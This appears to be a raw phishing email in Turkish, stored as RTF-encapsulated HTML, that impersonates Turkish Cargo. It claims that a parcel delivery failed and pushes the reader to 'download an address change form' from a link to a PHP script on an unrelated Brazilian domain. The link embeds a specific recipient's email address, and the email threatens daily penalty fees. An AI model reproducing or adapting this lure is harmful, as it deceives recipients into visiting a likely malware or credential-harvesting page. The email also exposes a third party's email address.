{\rtf1\ansi\ansicpg1254\fromhtml1 \fbidis \deff0{\fonttbl
{\f0\fswiss\fcharset162 Arial;}
{\f1\fmodern Courier New;}
{\f2\fnil\fcharset2 Symbol;}
{\f3\fmodern\fcharset0 Courier New;}}
{\colortbl\red0\green0\blue0;\red0\green0\blue255;}
\uc1\pard\plain\deftab360 \f0\fs24 
{\*\htmltag243 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">}
{\*\htmltag19 <html>}
{\*\htmltag34 <head>}
{\*\htmltag1 \par }
{\*\htmltag177 <title>}
{\*\htmltag241 TURKISH CARGO}
{\*\htmltag185 </title>}
{\*\htmltag1 \par }
{\*\htmltag1 \par }
{\*\htmltag161 <meta name="GENERATOR" content="MSHTML 11.00.9600.17105">}
{\*\htmltag41 </head>}
{\*\htmltag2 \par }
{\*\htmltag50 <body>}
{\*\htmltag0 \par }
{\*\htmltag96 <table style="WIDTH: 600px; FONT-FAMILY: Arial, Helvetica, sans-serif">}\htmlrtf {\pard\plain \f0\fs24 \htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag96 <tbody>}
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag148 <td style="PADDING-BOTTOM: 15px; MARGIN-TOP: 15px; PADDING-LEFT: 25px; WIDTH: 550px; PADDING-RIGHT: 25px; FLOAT: left; PADDING-TOP: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag148 <span style="POSITION: relative; LINE-HEIGHT: 0.8em; TEXT-TRANSFORM: uppercase; DISPLAY: block; FONT-FAMILY: 'Arial Black', Gadget, sans-serif; FLOAT: left; HEIGHT: 42px; PADDING-TOP: 5px">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <a style="TEXT-DECORATION: none" href="#" target="_blank">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <img style="Z-INDEX: 5; POSITION: absolute; WIDTH: 262px; HEIGHT: 47px; TOP: 0px; LEFT: 0px" alt="Turkish Kargo" src="http://centrocrescer.com.br/GzF5t/4VQhtLkH621adZem.jpg">}\htmlrtf  {\field{\*\fldinst{HYPERLINK "http://centrocrescer.com.br/GzF5t/4VQhtLkH621adZem.jpg"}}{\fldrslt\cf1\ul }}\htmlrtf0 Turk
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 Cargo\htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}
{\*\htmltag156 </span>}\htmlrtf }\htmlrtf0  
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag148 <td style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84       }
{\*\htmltag68 <p>}Say\'fdn M\'fc\'feterimiz\htmlrtf }\htmlrtf0 \htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <strong>}\htmlrtf {\b \htmlrtf0 MK4167831274TR
{\*\htmltag92 </strong>}\htmlrtf }\htmlrtf0  
{\*\htmltag4 \par }
{\*\htmltag84       }G\'f6nderi kodlu 
{\*\htmltag4 \par }
{\*\htmltag84       }kargonuz 
{\*\htmltag84 <b>}\htmlrtf {\b \htmlrtf0 28 Kas\'fdm 2016
{\*\htmltag92 </b>}\htmlrtf }\htmlrtf0  
{\*\htmltag4 \par }
{\*\htmltag84       }adresinize teslim 
{\*\htmltag4 \par }
{\*\htmltag84       }edilememi\'fetir. Dikkat adresinizi 
{\*\htmltag4 \par }
{\*\htmltag84       }kaydedip kargoyu
{\*\htmltag84        }\htmlrtf  \htmlrtf0 al\'fdn.\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 M\'fc\'feteri adres 
{\*\htmltag4 \par }
{\*\htmltag84       }de\'f0i\'femek i\'e7in Turk Cargo 
{\*\htmltag84 <a style="COLOR: #de0000" href="http://centrocrescer.com.br/GzF5t/SWG4nEQ.php?ud=engin.sener@lcwaikiki.com&amp;num=MK4167831274TR" target="_blank">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://centrocrescer.com.br/GzF5t/SWG4nEQ.php?ud=engin.sener@lcwaikiki.com&num=MK4167831274TR" \\n}}{\fldrslt\cf1\ul \htmlrtf0 Adres De\'f0i\'feikli\'f0i Formu indirip\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>} 
{\*\htmltag4 \par }
{\*\htmltag84       }dikkatle
{\*\htmltag84        }\htmlrtf  \htmlrtf0 doldurunuz.\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p style="TEXT-ALIGN: center">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <a style="PADDING-BOTTOM: 8px; MARGIN: 10px 0px; PADDING-LEFT: 15px; PADDING-RIGHT: 15px; DISPLAY: inline-block; COLOR: #fff; FONT-SIZE: 15px; TEXT-DECORATION: none; PADDING-TOP: 8px; border-radius: 10px" href="http://centrocrescer.com.br/GzF5t/SWG4nEQ.php?ud=engin.sener@lcwaikiki.com&amp;num=MK4167831274TR" target="_blank">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://centrocrescer.com.br/GzF5t/SWG4nEQ.php?ud=engin.sener@lcwaikiki.com&num=MK4167831274TR" \\n}}{\fldrslt\cf1\ul \htmlrtf0 
{\*\htmltag148 <span style="POSITION: relative; DISPLAY: inline-block; BACKGROUND: #de0000; border-radius: 10px">}\htmlrtf {\htmlrtf0 Adres
{\*\htmltag84        }\htmlrtf  \htmlrtf0 De\'f0i\'feikli\'f0i Formu
{\*\htmltag156 </span>}\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <strong>}\htmlrtf {\b \htmlrtf0 Dikkat
{\*\htmltag92 </strong>}\htmlrtf }\htmlrtf0 \htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 Kargo 7 \'e7al\'fd\'fema g\'fcn\'fc i\'e7inde 
{\*\htmltag4 \par }
{\*\htmltag84       }toplaman\'fdz gerekir. 
{\*\htmltag4 \par }
{\*\htmltag84       }Herhangi bir ekstra g\'fcn i\'e7in Turk Cargo sizden Bir g\'fcn i\'e7in 30YTL tezminat
{\*\htmltag84        }\htmlrtf  \htmlrtf0 talep etme hakk\'fdna sahip olacakt\'fdr.\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 \'ddleriye d\'f6n\'fck a\'e7\'fdklamalar,
{\*\htmltag84        }\htmlrtf  \htmlrtf0 tarihsel verileri temel almamakla birlikte, daha \'e7ok Turkish Cargo\'92nin
{\*\htmltag84        }\htmlrtf  \htmlrtf0 veya Turkish Cargo Limited ve ba\'f0l\'fd \'feirketlerinin gelecekteki sonu\'e7lara,
{\*\htmltag84        }\htmlrtf  \htmlrtf0 performansa, muhtemel m\'fc\'feterilere, f\'fdrsatlara ve etkinliklere ili\'fekin
{\*\htmltag84        }\htmlrtf  \htmlrtf0 g\'fcncel beklentilerini ve tahminlerini yans\'fdt\'fdr. 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 Bu web sitesinde yer verilen ileriye d\'f6n\'fck
{\*\htmltag84        }\htmlrtf  \htmlrtf0 a\'e7\'fdklamalar ilk d\'fczenlendikleri tarih itibariyle veya ilgili materyal
{\*\htmltag84        }\htmlrtf  \htmlrtf0 \'fczerinde belirtilen tarihli olup, do\'f0ru ve eksiksiz olamayabilirler ve
{\*\htmltag84        }\htmlrtf  \htmlrtf0 Turkish Cargo\'92nin ve Turkish Cargo Limited ve ba\'f0l\'fd \'feirketlerinin sonradan
{\*\htmltag84        }\htmlrtf  \htmlrtf0 meydana gelen olaylar\'fd ve mevcut durumlar\'fd yans\'fdtmak i\'e7in ileriye d\'f6n\'fck
{\*\htmltag84        }\htmlrtf  \htmlrtf0 a\'e7\'fdklamalar\'fd aleni olarak g\'fcncelleme y\'fck\'fcml\'fcl\'fc\'f0\'fc bulunmamaktad\'fdr. 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 Bu web sitesinde yer
{\*\htmltag84        }\htmlrtf  \htmlrtf0 verilen ileriye d\'f6n\'fck a\'e7\'fdklamalar ilk d\'fczenlendikleri tarih itibariyle
{\*\htmltag84        }\htmlrtf  \htmlrtf0 veya ilgili materyal \'fczerinde belirtilen tarihli olup, do\'f0ru ve eksiksiz
{\*\htmltag84        }\htmlrtf  \htmlrtf0 olamayabilirler ve Turkish Cargo\'92nin ve Turkish Cargo Limited ve ba\'f0l\'fd
{\*\htmltag84        }\htmlrtf  \htmlrtf0 \'feirketlerinin sonradan meydana gelen olaylar\'fd ve mevcut durumlar\'fd
{\*\htmltag84        }\htmlrtf  \htmlrtf0 yans\'fdtmak i\'e7in ileriye d\'f6n\'fck a\'e7\'fdklamalar\'fd aleni olarak g\'fcncelleme
{\*\htmltag84        }\htmlrtf  \htmlrtf0 y\'fck\'fcml\'fcl\'fc\'f0\'fc bulunmamaktad\'fdr. \htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag112 <br>}\htmlrtf \par
\htmlrtf0 
{\*\htmltag248 </td>}
{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag148 <td style="TEXT-ALIGN: center; BACKGROUND: #92cae7; HEIGHT: 49px; COLOR: #fff; FONT-SIZE: 13px">}\htmlrtf {\htmlrtf0 
{\*\htmltag148 <span>}\htmlrtf {\htmlrtf0 
{\*\htmltag4  }Kargo Takip
{\*\htmltag84        }\htmlrtf  \htmlrtf0 Bilgisi, TURKISH CARGO A.S. 
{\*\htmltag156 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag104 </tbody>}
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag58 </body>}
{\*\htmltag27 </html>}
{\*\htmltag3 \par }}6
di1 \N\c